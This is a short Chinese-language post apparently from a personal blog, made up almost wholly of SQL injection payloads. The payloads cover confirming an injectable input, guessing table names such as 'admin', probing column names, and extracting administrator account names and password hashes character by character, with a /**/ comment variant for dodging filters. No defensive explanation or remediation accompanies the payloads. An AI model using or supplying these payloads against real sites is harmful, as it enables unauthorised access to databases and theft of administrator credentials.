黄聪：SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码

检查漏洞

1' or 1=1  or ('1' = '1
1' or 1=1)  or '1' = '1
1' or 1=1 or '1' = '1
1'/**/or/**/1=1/**/or/**/'1'= '1

猜表名
1' or 0<(select count(*) from admin) and '1' = '1
1'/**/or/**/0<(select/**/count(*)/**/from/**/user)/**/and/**/'1'='1
1'/**/or/**/0<(select/**/count(*)/**/from/**/guanliyuan)/**/and/**/'1'='1


猜列名
1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1

猜帐号
1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1)  and '1' = '1
1' or 1<(select top 1 count(*) from admin where name = 'XXX' )  and '1' = '1

猜帐号
1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635   and '1' = '1
1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a')  and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1